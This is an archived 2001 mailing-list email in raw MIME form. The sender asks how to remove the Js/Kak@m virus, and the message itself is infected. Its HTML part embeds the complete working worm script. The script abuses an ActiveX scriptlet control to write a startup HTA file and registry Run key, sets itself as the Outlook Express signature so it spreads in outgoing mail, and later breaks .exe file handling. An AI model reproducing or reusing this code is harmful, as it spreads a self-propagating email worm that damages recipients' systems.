[ic] Js/Kak@m virus

Mark cutless@one.net.au
Fri, 12 Jan 2001 15:19:56 +1000


This is a multi-part message in MIME format.

------=_NextPart_000_0007_01C07CAB.1F39AFE0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Greetings,

I was informed by a postmaster that an email I sent was infected with =
the Js/Kak@m Virus.

Can you tell me how to get rid of it, please?

Thankyou,
Mark schneider


------=_NextPart_000_0007_01C07CAB.1F39AFE0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 5.50.4522.1800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Greetings,</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>I was informed by a postmaster that an =
email I sent=20
was infected with the <A href=3D"mailto:Js/Kak@m">Js/Kak@m</A> =
Virus.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Can you tell me how to get rid of it,=20
please?</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Thankyou,</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Mark schneider</FONT></DIV>
<DIV>
<DIV style=3D"Z-INDEX: 5; RIGHT: 0px; POSITION: absolute; TOP: -20px">
<OBJECT id=3Dscr=20
classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC></OBJECT></DIV>
<SCRIPT><!--
function sE(){return =
true;}window.onerror=3DsE;scr.Reset();scr.doc=3D"Z<HTML><HEAD><TITLE>.</"=
+"TITLE><HTA:APPLICATION ID=3D\\\"hO\\\" =
WINDOWSTATE=3DMinimize></"+"HEAD><BODY><object id=3D'wsh' =
classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><scrip=
t>fs=3Dnew =
ActiveXObject('Scripting.FileSystemObject');wc=3D'C:\\\\Windows\\\\';ae=3D=
'C:\\\\Autoexec.bat';f1=3Dwc+'STARTM~1\\\\Programs\\\\StartUp\\\\Exec.hta=
';fl=3Dfs.GetFolder(wc+'Applic~1\\\\Identities');sbf=3Dfl.SubFolders;for(=
var mye=3Dnew =
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =
String(idd);idn=3Dids.slice(31);gt=3Dwc+'System\\\\G6D9.fld';if(fs.FileEx=
ists(gt)){as=3Dfs.OpenTextFile(gt,1);gh=3Das.ReadAll();as.close();as=3Dfs=
OpenTextFile(gt,2);gh++;as.WriteLine(gh);as.close();}else{pol=3Dfs.Create=
TextFile(gt);pol.WriteLine('0');pol.close();fs.GetFile(gt).Attributes=3D2=
;gh=3D0;}f2=3Dwc+'System\\\\exec.hta';if(fs.FileExists(f2)){}else{fs.Copy=
File(f1,f2);fs.GetFile(f2).Attributes=3D2;}fr=3Dwc+'exc.reg';reg=3Dfs.Cre=
ateTextFile(fr);reg.WriteLine('REGEDIT4');reg.WriteBlankLines(1);reg.Writ=
eline('[HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\Current=
Version\\\\Run]');reg.Writeline('\"Exec\"=3D\"C:\\\\\\\\Windows\\\\\\\\Sy=
stem\\\\\\\\exec.hta\"');reg.WriteBlankLines(1);ky=3D'[HKEY_CURRENT_USER\=
\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook =
Express\\\\5.0';sg=3D'\\\\signatures';reg.WriteLine(ky+sg+']');reg.Write(=
'\"Default Signature\"=3D\"00000000\"');reg.WriteBlankLines(2); =
reg.WriteLine(ky+sg+'\\\\00000000]'); reg.WriteLine('\"name\"=3D\"My =
Signature\"');reg.WriteLine('\"type\"=3Ddword:00000002'); =
reg.WriteLine('\"text\"=3D\"\"');reg.Write('\"file\"=3D\"C:\\\\\\\\WINDOW=
S\\\\\\\\Exc.htm\"'); =
reg.WriteBlankLines(2);reg.WriteLine(ky+']');reg.Write('\"Signature =
Flags\"=3Ddword:00000003');reg.WriteBlankLines(2);reg.close();fs.GetFile(=
fr).Attributes=3D2;wsh.Run(wc+'Regedit.exe -s =
'+fr);if(gh=3D=3D0){df=3Dfs.OpenTextFile(ae,8);df.WriteLine('del =
'+f1);df.Close();}if(gh>9){b=3Dfs.CreateTextFile(\"C:\\\\Windows\\\\execf=
all.reg\");b.WriteLine('REGEDIT4');b.WriteBlankLines(1);b.WriteLine('[HKE=
Y_CLASSES_ROOT\\\\exefile\\\\shell\\\\open\\\\command]');b.WriteLine('@=3D=
\"C:\\\\\\\\Windows\\\\\\\\notepad.exe\"');b.Close();wsh.Run(wc+'Regedit.=
exe -s C:\\\\Windows\\\\execfall.reg');while(true){alert(\"Executive =
Fallout\");}}t3=3Dfs.CreateTextFile(wc+'Exc.htm',1);fs.GetFile(wc+'Exc.ht=
m').Attributes=3D2;t3.Write('<HTML><BODY><DIV =
style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT =
classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC =
id=3Dscr></"+"OBJECT></"+"DIV>');t4=3Dfs.OpenTextFile(f2,1);while(t4.Read=
(1)!=3D'Z');t3.WriteLine('<SCRIPT><!--');t3.write('function sE(){return =
true;}window.onerror=3DsE;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.ReadAll();t=
4.close();rd=3D/\\\\/g;re=3D/\"/g;rf=3D/<\\//g;rt=3Drs.replace(rd,'\\\\\\=
\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=
=3D(navigator.systemLanguage)?navigator.systemLanguage:navigator.language=
;scr.Path=3D(la=3D=3D\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu =
D=E9marrer\\\\\\\\Programmes\\\\\\\\D=E9marrage\\\\\\\\Exec.hta\":\"C:\\\=
\\\\\windows\\\\\\\\Start =
Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\Exec.hta\";agt=3Dnavigator.use=
rAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=3D-1)&&(parseInt(navigat=
or.appVersion)>4))||(agt.indexOf(\"msie =
5.\")!=3D-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT>=
</"+"'+'BODY></"+"'+'HTML>');t3.close();self.close();</"+"script>-MassMur=
derer</"+"BODY></"+"HTML>WW";la=3D(navigator.systemLanguage)?navigator.sy=
stemLanguage:navigator.language;scr.Path=3D(la=3D=3D"fr")?"C:\\windows\\M=
enu D=E9marrer\\Programmes\\D=E9marrage\\Exec.hta":"C:\\windows\\Start =
Menu\\Programs\\StartUp\\Exec.hta";agt=3Dnavigator.userAgent.toLowerCase(=
);if(((agt.indexOf("msie")!=3D-1)&&(parseInt(navigator.appVersion)>4))||(=
agt.indexOf("msie 5.")!=3D-1))scr.write();
//--></SCRIPT>
</OBJECT></DIV></BODY></HTML>

------=_NextPart_000_0007_01C07CAB.1F39AFE0--